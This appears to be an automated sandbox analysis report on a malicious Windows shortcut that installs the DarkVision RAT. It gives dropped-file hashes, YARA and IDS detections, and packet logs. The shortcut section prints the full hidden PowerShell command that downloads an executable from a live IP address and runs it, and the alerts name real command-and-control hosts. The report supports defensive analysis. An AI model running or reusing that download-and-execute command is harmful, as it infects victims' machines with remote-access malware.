                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1af1zgpl.lmn.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2zxceyhk.zfh.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h25xlofk.3tk.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwl0zcwq.cwq.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxdwnivx.llv.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rdyn2h4f.kbe.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwal1uc2.bqr.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjnt0n5a.e3k.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykp54gop.jrl.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrsturii.5ix.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Users\user\AppData\Local\Temp\file.exe

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4220416
                                                        Entropy (8bit):5.916038660889432
                                                        Encrypted:false
                                                        SSDEEP:49152:iKJMALBVPTgl5g0jDRAu2tFtxZCDo8MvOgXmZk8b:bgrjDRApJjCbHZk
                                                        MD5:D37285BF0331C7514E5E4CEC0FBE647C
                                                        SHA1:2A83F532B50FB5ACD4F417C2CE51A1EAC1BB9C08
                                                        SHA-256:F96C269716F360AA2FBB1926DDA79C3FF47EA7D8EC6615CDE06B205D28400F79
                                                        SHA-512:D1A9F56A504BC6D13A0AF3AC1CAF97D9BC86ACE60577B87A2F7143C3C94ADE29605559B9122C19D2A8CA2F817D6EFE123A24C75012B9C22241FBCDF2938B1D81
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: Joe Security
                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\file.exe, Author: ditekSHen
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ a.[A..[A..[A..47.._A..@..QA..R9..XA..R9..ZA..R9..RA..[A..%A..@...A..@..2A..@..ZA..@..ZA..Rich[A..........PE..d...M.6g.........."......|...........`@........@..............................@.....CbA...@................................................................. p@.@................................................................................................... . .p.......p..................@....rsrc...............................@....idata ............................@...ikkqoqkj..8.......8.................@...bywcbldd.....`@......F@.............@....pdata.I. ...p@......H@.............@..@................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8DELK0AE191IASFC55J7.temp

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5346
                                                        Entropy (8bit):3.454790457518796
                                                        Encrypted:false
                                                        SSDEEP:48:T0oxe6T9DxBUBwNlXl1pSogZo6WhwNlXlepSogZo6C1:TXzTl4KlXIH7yKlXdH7s
                                                        MD5:84277D0BA9ABE4256D92219C333FAD30
                                                        SHA1:1C5B7194D4164A425E143C76CC86F586049919A5
                                                        SHA-256:3A8F79CECCFA09BEAB7C93BF4200F247F5C7A7524083E49BC56A3948B6448E24
                                                        SHA-512:4E8C39A0C0F7EA3423794C3BDA4AC82AEBEA7FA90AE7E9CE3F38AAF6F3BEE8467B97F6B4A172B229D21C14FF5113596ED3C91FECDBB80B6F40F423EE48CFD9C0
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. .....>.g....@~.][...o..][...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd...!...g....@~.][....h.2......Y.C .009274~1.LNK..L......EW.D.Y.C.....$........................0.0.9.2.7.4.9.6.5...l.n.k.......T...............-.......S............rfT.....C:\Users\user\Desktop\009274965.lnk..%.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.z.a.m.p...i.c.o.........%SystemDrive%\Users\admin\Desktop\windo\zamp.ico....................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.z.a.m.p...i.c.o...................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\aed993fbadc0e8b2.customDestinations-ms (copy)

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):5346
                                                        Entropy (8bit):3.454790457518796
                                                        Encrypted:false
                                                        SSDEEP:48:T0oxe6T9DxBUBwNlXl1pSogZo6WhwNlXlepSogZo6C1:TXzTl4KlXIH7yKlXdH7s
                                                        MD5:84277D0BA9ABE4256D92219C333FAD30
                                                        SHA1:1C5B7194D4164A425E143C76CC86F586049919A5
                                                        SHA-256:3A8F79CECCFA09BEAB7C93BF4200F247F5C7A7524083E49BC56A3948B6448E24
                                                        SHA-512:4E8C39A0C0F7EA3423794C3BDA4AC82AEBEA7FA90AE7E9CE3F38AAF6F3BEE8467B97F6B4A172B229D21C14FF5113596ED3C91FECDBB80B6F40F423EE48CFD9C0
                                                        Malicious:false
                                                        Preview:...................................FL..................F.`.. .....>.g....@~.][...o..][...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........Yd...!...g....@~.][....h.2......Y.C .009274~1.LNK..L......EW.D.Y.C.....$........................0.0.9.2.7.4.9.6.5...l.n.k.......T...............-.......S............rfT.....C:\Users\user\Desktop\009274965.lnk..%.C.:.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.z.a.m.p...i.c.o.........%SystemDrive%\Users\admin\Desktop\windo\zamp.ico....................................................................................................................................................................................................................%.S.y.s.t.e.m.D.r.i.v.e.%.\.U.s.e.r.s.\.a.d.m.i.n.\.D.e.s.k.t.o.p.\.w.i.n.d.o.\.z.a.m.p...i.c.o...................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\{5CAAC06D-2278-4820-8E02-FD7BF03ADE5D}.lnk

                                                        Download File
                                                        Process:C:\Windows\explorer.exe
                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Dec 31 07:28:35 2024, mtime=Tue Dec 31 07:28:35 2024, atime=Tue Dec 31 07:28:35 2024, length=101, window=hide
                                                        Category:dropped
                                                        Size (bytes):1087
                                                        Entropy (8bit):4.54997754253574
                                                        Encrypted:false
                                                        SSDEEP:24:88JDXg5LhQei1TOyAJHI5ahVwW+1T179m:8ujg5LCIJHIIhVo9
                                                        MD5:36F979EE9460A9AEB2129E7EAF4026A3
                                                        SHA1:D490CE6C9ACF64A90C17FD2A7733D030236917ED
                                                        SHA-256:28B39297FD1FB77004D790DE0932E0AEF61FE812757E739AE860D3E54020F48A
                                                        SHA-512:E50AD898CA17CC8BD2CEBE82ACBE20FE50D39EBC3D19F5988CD7BA65EE9A9DB85B233634E585E9C51D90EF923EB204124CA71F830AD4695827F5BFDD5440E5B7
                                                        Malicious:false
                                                        Preview:L..................F.... ......][......][......][..e............................P.O. .:i.....+00.../C:\...................`.1......Y.C. PROGRA~3..H......O.I.Y.C....g......................&..P.r.o.g.r.a.m.D.a.t.a.......1......Y.C. {43FE0~1..~......Y.C.Y.C.....#....................TsF.{.4.3.F.E.0.1.2.8.-.8.1.9.5.-.4.F.1.C.-.A.D.A.F.-.9.7.0.8.5.D.2.B.6.4.4.1.}.......2.e....Y.C {32346~1.BAT.........Y.C.Y.C....b$....................TsF.{.3.2.3.4.6.7.A.8.-.4.5.D.A.-.4.7.D.5.-.A.F.5.3.-.6.0.B.D.8.A.3.D.7.B.C.B.}...b.a.t.......................-....................rfT.....C:\ProgramData\{43FE0128-8195-4F1C-ADAF-97085D2B6441}\{323467A8-45DA-47D5-AF53-60BD8A3D7BCB}.bat..x.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.{.4.3.F.E.0.1.2.8.-.8.1.9.5.-.4.F.1.C.-.A.D.A.F.-.9.7.0.8.5.D.2.B.6.4.4.1.}.\.{.3.2.3.4.6.7.A.8.-.4.5.D.A.-.4.7.D.5.-.A.F.5.3.-.6.0.B.D.8.A.3.D.7.B.C.B.}...b.a.t.`.......X.......405464...........hT..CrF.f4... ..S..Yc...,...E...hT..CrF.f4... ..S

                                                        Static File Info

                                                        General

                                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Thu Aug 22 09:59:47 2013, mtime=Thu Aug 22 09:59:47 2013, atime=Thu Aug 22 09:59:47 2013, length=479744, window=hide
                                                        Entropy (8bit):3.4718099698331453
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:009274965.lnk
                                                        File size:2'282 bytes
                                                        MD5:7f070dfbaa6893bb2effac0f2320a1d7
                                                        SHA1:293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
                                                        SHA256:aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
                                                        SHA512:720b2a90dd051160aeaa1a11a70433213b96f04e8d160c55c699f4fd6af7f1c07db61e110e684d9ce91ad79e987bd809497eb2d52ac2f3bd96cdb289c443b883
                                                        SSDEEP:24:8WKYmA8RAzJDqPl2UJK8w/W0AfWkp+/CWHiAGfeuUMkWU53BDiOyKBorab/dq3kV:8WKYlzJOPsWDovuHwRDigOabdIkV
                                                        TLSH:A041AC111BF56624DBF7A7BAACB573118636BC0ADF518F8F0260C54A2C51320E824F2F
                                                        File Content Preview:L..................F.@.. ...>=..&...>=..&....)t.&....R...........................P.O. .:i.....+00.../C:\...................V.1......YaP..Windows.@........C.l.YaP....).........................W.i.n.d.o.w.s.....Z.1......Y.Y..System32..B........C.l.Y.Y....9.

                                                        File Icon

                                                        Icon Hash:74f0e4e4e4e1e1ed

                                                        Static Windows Shortcut Info

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Command Line Argument:-windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile %TEMP%\file.exe; Start-Process '%TEMP%\file.exe' }"
                                                        Icon location:C:\Users\admin\Desktop\windo\zamp.ico

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-12-31T09:28:24.646692+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.84970887.120.113.9180TCP
                                                        2024-12-31T09:28:24.646706+01001810003Joe Security ANOMALY Windows PowerShell HTTP PE File Download287.120.113.9180192.168.2.849708TCP
                                                        2024-12-31T09:28:40.039293+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.84971287.121.86.2143440TCP
                                                        2024-12-31T09:28:41.314009+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.84971287.121.86.2143440TCP
                                                        2024-12-31T09:28:41.947167+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.84971387.121.86.2143440TCP
                                                        2024-12-31T09:28:42.824625+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85925587.121.86.2143440TCP
                                                        2024-12-31T09:28:43.631999+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85925687.121.86.2143440TCP
                                                        2024-12-31T09:28:44.432792+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85925787.121.86.2143440TCP
                                                        2024-12-31T09:28:45.213759+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85925887.121.86.2143440TCP
                                                        2024-12-31T09:29:32.455077+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85935787.121.86.2143440TCP
                                                        2024-12-31T09:29:33.524717+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.85935787.121.86.2143440TCP
                                                        2024-12-31T09:29:33.981907+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85936887.121.86.2143440TCP
                                                        2024-12-31T09:29:34.769417+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85937487.121.86.2143440TCP
                                                        2024-12-31T09:29:35.560094+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85938087.121.86.2143440TCP
                                                        2024-12-31T09:29:36.386881+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85938687.121.86.2143440TCP
                                                        2024-12-31T09:29:37.179091+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85939287.121.86.2143440TCP
                                                        2024-12-31T09:30:18.491262+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85962987.121.86.2143440TCP
                                                        2024-12-31T09:30:19.569619+01002045619ET MALWARE Win32/DarkVision RAT CnC Checkin M31192.168.2.85962987.121.86.2143440TCP
                                                        2024-12-31T09:30:20.012548+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85963087.121.86.2143440TCP
                                                        2024-12-31T09:30:20.807189+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85963187.121.86.2143440TCP
                                                        2024-12-31T09:30:21.665428+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85963287.121.86.2143440TCP
                                                        2024-12-31T09:30:22.466740+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85963387.121.86.2143440TCP
                                                        2024-12-31T09:30:23.241641+01002045618ET MALWARE Win32/DarkVision RAT CnC Checkin M11192.168.2.85963487.121.86.2143440TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Dec 31, 2024 09:28:24.006755114 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.011872053 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.011945963 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.014983892 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.019766092 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646550894 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646599054 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646611929 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646681070 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646692038 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.646706104 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.646739960 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.696960926 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.728265047 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728290081 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728300095 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728343964 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.728360891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728398085 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.728419065 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728430986 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728442907 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.728471994 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.729150057 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.729192972 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.734004974 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.734066963 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.734077930 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.734110117 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.775130033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.810053110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.810080051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.810162067 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.810224056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.810281038 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.810292959 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.810323000 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.810996056 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.811026096 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.811038017 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.811120033 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.811134100 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.811156988 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.815834045 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.815853119 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.815884113 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.815975904 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.815987110 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.816025019 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.816170931 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.816189051 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.816209078 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.816215992 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.816252947 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.816267967 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.868870020 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.891894102 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.891913891 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.891926050 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892019033 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.892035007 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892060995 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892097950 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.892136097 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892148018 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892178059 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.892774105 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892786026 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892797947 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892823935 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.892837048 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892847061 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.892858982 CET804970887.120.113.91192.168.2.8
                                                        Dec 31, 2024 09:28:24.892920971 CET4970880192.168.2.887.120.113.91
                                                        Dec 31, 2024 09:28:24.893588066 CET804970887.120.113.91192.168.2.8
